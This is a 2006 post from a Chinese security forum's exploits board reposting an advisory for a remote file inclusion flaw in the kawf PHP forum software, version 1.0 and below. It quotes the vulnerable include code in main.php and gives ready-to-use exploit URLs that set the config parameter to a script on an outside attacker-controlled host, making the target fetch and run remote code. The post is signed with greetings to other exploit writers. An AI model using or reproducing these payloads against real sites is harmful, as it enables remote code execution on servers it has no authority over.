kawf <= 1.0 (main.php) Remote File Include Vulnerability

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-10-21 21:47 只看该作者

kawf <= 1.0 (main.php) Remote File Include Vulnerability

复制内容到剪贴板

代码:

####################################################################

#     kawf (config)  Remote File Include

#---------------------------------------------------------------------------------------------

#     Kawf is a web forum written in PHP4 using MySQL

#      v. 1.0 and all below

#--------------------------------------------------------------------------------------------

#     download :

#     [url]http://sourceforge.net/projects/kawf[/url]

#--------------------------------------------------------------------------------------------

#     see the bug file:

#     [url]http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require[/url]

#--------------------------------------------------------------------------------------------

#     bug in  :

#     main.php

#--------------------------------------------------------------------------------------------

#code : { i wrote all code for str0ke :D :D } include in line 13 ::

#                                     #

#                                     /* First setup the path */

#                                     $include_path = "$srcroot/include:$srcroot/user/account";

#                                     if (isset($include_append))

#                                      $include_path .= ":" . $include_append;

#

#                                     $old_include_path = ini_get("include_path");

#                                     if (!empty($old_include_path))

#                                      $include_path .= ":" . $old_include_path;

#                                     ini_set("include_path", $include_path);

#

#                                     include_once("$config.inc");

#                                     require_once("sql.inc");

#                                     require_once("util.inc");

#                                     require_once("page.inc");

#                                     require_once("forumuser.inc");

#

#                                     sql_open($database);

#

#                                     include("index.php");

#

#                                     sql_close();

#                                     ?>

#--------------------------------------------------------------------------------------------

#     exploit:

#       kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

#                            or

#      (path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

#--------------------------------------------------------------------------

#     greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D

#    inter_vieri_21 dont play runescape :d :d

#-------------------------------------------------------------------------

#    by o0xxdark0o

# i think... so that... i m here

#  [email]o0xxdark0o@msn.com[/email]

####################################################################

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » kawf <= 1.0 (main.php) Remote File Include Vulnerability

kawf &lt;= 1.0 (main.php) Remote File Include Vulnerability

kawf &lt;= 1.0 (main.php) Remote File Include Vulnerability

代码:

kawf <= 1.0 (main.php) Remote File Include Vulnerability

kawf <= 1.0 (main.php) Remote File Include Vulnerability